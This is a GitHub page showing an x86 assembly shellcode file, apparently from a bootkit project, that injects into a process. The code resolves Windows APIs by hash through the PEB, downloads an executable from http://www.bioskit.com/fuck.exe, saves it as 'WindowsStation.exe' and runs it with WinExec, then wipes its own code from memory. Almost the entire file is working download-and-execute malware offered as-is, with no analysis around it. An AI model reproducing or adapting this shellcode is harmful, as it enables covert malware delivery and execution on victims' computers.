forked from killvxk/BootLoader
-
Notifications
You must be signed in to change notification settings - Fork 0
/
x86InjectShellCode.Asm
259 lines (239 loc) · 5.85 KB
/
x86InjectShellCode.Asm
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
USE32
ShellCode_Start:
call GetKernel32BaseAddress_Start
mov ebx,[esi + 0x3C]
add ebx,esi
call GetApiListFromHash_Start
push ebp
call GetCurrentAddress
GetCurrentAddress:
BASE_OFFSET_CURRENT_ADDRESS equ (GetCurrentAddress - ShellCode_Start)
pop ebp
sub ebp,BASE_OFFSET_CURRENT_ADDRESS
;///////////////////////////////////////////////////////////////////////////////////////////
;push 0
;push 0x80
;push 4
;push 0
;push 1
;push 0x1F01FF
;lea ecx,[ebp + RunExeName]
;push ecx
;call [ebp + x86_CreateFileA]
;cmp eax,0xFFFFFFFF
;jz ShellCode_Return
;mov [ebp + x86_DownloaderHandle],eax
;push 0
;lea edx,[ebp + x86_RetWriteBytes]
;push edx
;push Downloader_End - Downloader_Start
;lea ecx,[ebp + Downloader_Start]
;push ecx
;push eax
;call [ebp + x86_WriteFile]
;mov ebx,eax
;mov ecx,[ebp + x86_DownloaderHandle]
;push ecx
;call [ebp + x86_CloseHandle]
;cmp ebx,0
;jz ShellCode_Return
;///////////////////////////////////////////////////////////////////////////////////////////
lea ecx,[ebp + Lib_User32_Name]
push ecx
call [ebp + x86_LoadLibraryA]
mov [ebp + x86_User32Module],eax
lea edx,[ebp + MessageBoxA_Name]
mov ecx,eax
push edx
push ecx
call [ebp + x86_GetProcAddress]
push 0
lea edx,[ebp + RunExeName]
push edx
lea ecx,[ebp + UrlAddress]
push ecx
push 0
call eax
mov ecx,[ebp + x86_User32Module]
push ecx
call [ebp + x86_FreeLibrary]
;///////////////////////////////////////////////////////////////////////////////////////////
%ifdef _URL_DOWNLOAD_FILE
lea ecx,[ebp + Lib_Urlmon_Name]
push ecx
call [ebp + x86_LoadLibraryA]
mov [ebp + x86_UrlMonModule],eax
lea ebx,[ebp + URLDownloadToFile_Name]
push ebx
push eax
call [ebp + x86_GetProcAddress]
mov [ebp + x86_URLDownloadToFile],eax
ShellCode_Download:
push 5000
call [ebp + x86_Sleep]
push 0
push 0
lea edx,[ebp + RunExeName]
push edx
lea ecx,[ebp + UrlAddress]
push ecx
push 0
call [ebp + x86_URLDownloadToFile]
cmp eax,0
jnz ShellCode_Return
;jnz ShellCode_Download
push 0
lea ecx,[ebp + RunExeName]
push ecx
call [ebp + x86_WinExec]
lea esi,[ebp + x86_UrlMonModule]
push esi
call [ebp + x86_FreeLibrary]
ShellCode_Return:
%endif
;///////////////////////////////////////////////////////////////////////////////////////////
pop ebp
mov esp,ebp
jmp ShellCode_Clean_Code
GetApiListFromHash_Start:
pushad
mov edx,[ebx + 0x78]
add edx,esi
xor ebx,ebx
mov ecx,[edx + 0x20]
add ecx,esi
mov eax,[edx + 0x1C]
add eax,esi
mov edi,[edx + 0x18]
mov ebp,[edx + 0x24]
add ebp,esi
Calc_Next:
mov edx,[ecx]
add edx,esi
push eax
push ebx
mov bx,[ebp + ebx * 2 + 0x00]
and ebx,0xFFFF
mov eax,[eax + ebx * 0x04]
add eax,esi
call CmpHashValueAndSaveApiAddress_Start
pop ebx
pop eax
add ecx,0x04
inc ebx
dec edi
jnz Calc_Next
popa
retn
GetApiListFromHash_End:
CmpHashValueAndSaveApiAddress_Start:
pushad
mov ebx,eax
call CalcApiNameHashValue_Start
mov edx,eax
call HashValue_GetCurrentAddress
HashValue_GetCurrentAddress:
BASE_OFFSET_CURRENT_ADDRESS_HASH_VALUE equ (HashValue_GetCurrentAddress - ShellCode_Start)
pop ebp
sub ebp,BASE_OFFSET_CURRENT_ADDRESS_HASH_VALUE
lea esi,[ebp + MyUseApiHashValue]
lea edi,[ebp + MyUseApiSaveAddress]
CmpHashValueAndSaveApiAddress_Next:
add edi,0x04
lodsd
test eax,eax
jz CmpHashValueAndSaveApiAddress_Return
cmp eax,edx
jnz CmpHashValueAndSaveApiAddress_Next
mov [edi],ebx
CmpHashValueAndSaveApiAddress_Return:
popa
retn
CmpHashValueAndSaveApiAddress_End:
GetKernel32BaseAddress_Start:
mov edx,0x30
mov esi,[fs:edx]
mov esi,[esi + 0x0C]
mov esi,[esi + 0x0C]
lodsd
mov esi,[eax]
mov esi,[esi + 0x18]
retn
GetKernel32BaseAddress_End:
CalcApiNameHashValue_Start:
push ecx
push ebx
push edx
xor ecx,ecx
xor eax,eax
xor ebx,ebx
inc eax
CalcHashValue:
mov cl,[edx]
test cl,cl
jz Calc_Return
add eax,ecx
add ebx,eax
inc edx
jmp CalcHashValue
Calc_Return:
shl ebx,0x10
or eax,ebx
pop edx
pop ebx
pop ecx
ret
CalcApiNameHashValue_End:
Lib_Urlmon_Name db "urlmon.dll",0
URLDownloadToFile_Name db "URLDownloadToFileA",0
UrlAddress db "http://www.bioskit.com/fuck.exe",0
RunExeName db "WindowsStation.exe",0
Lib_User32_Name db "user32.dll",0
MessageBoxA_Name db "MessageBoxA",0
x86_User32Module dd 0x00000000
x86_UrlMonModule dd 0x00000000
;x86_DownloaderHandle dd 0x00000000
;x86_RetWriteBytes dd 0x00000000
;Downloader_Start:
;incbin './TestExe.exe'
;Downloader_End:
MyUseApiHashValue:
;HashValue_CreateFileA dd 0x18D00416
;HashValue_WriteFile dd 0x11C8038C
;HashValue_CloseHandle dd 0x191C0443
HashValue_LoadLibraryA dd 0x1D810497 ;LoadLibraryA 0x1D810497
HashValue_FreeLibrary dd 0x18F20458 ;FreeLibrary
;HashValue_VirtualAlloc dd 0x1F7004D3 ;VirtualAlloc
;HashValue_VirtualFree dd 0x1AAB046A ;VirtualFree
HashValue_GetProcAddress dd 0x27C7057B ;GetProcAddress
HashValue_WinExec dd 0x0AAD02B4 ;WinExec
HashValue_Sleep dd 0x05BD01FA ;Sleep
;HashValue_MessageBoxA dd 0x197F0430 ;MessageBoxA
HashValue_URLDownloadToFileA dd 0x3F3906B0 ;URLDownloadToFile
;HashValue_End dd 0x00000000 ;End
MyUseApiSaveAddress:
x86_Check_Resverd dd 0x00000000
;x86_CreateFileA dd 0x00000000
;x86_WriteFile dd 0x00000000
;x86_CloseHandle dd 0x00000000
x86_LoadLibraryA dd 0x00000000
x86_FreeLibrary dd 0x00000000
;x86_VirtualAlloc dd 0x00000000
;x86_VirtualFree dd 0x00000000
x86_GetProcAddress dd 0x00000000
x86_WinExec dd 0x00000000
x86_Sleep dd 0x00000000
x86_URLDownloadToFile dd 0x00000000
ShellCode_Clean_Code:
call ShellCode_Clean_Code_Address
ShellCode_Clean_Code_Address:
BASE_OFFSET_CURRENT_CLEAN_CODE_ADDRESS equ (ShellCode_Clean_Code_Address - ShellCode_Start)
pop eax
lea edi,[eax - BASE_OFFSET_CURRENT_CLEAN_CODE_ADDRESS]
mov ecx,ShellCode_Clean_Code - ShellCode_Start
xor eax,eax
rep stosb
popad
retn 0x0C
db 0x77
ShellCode_End: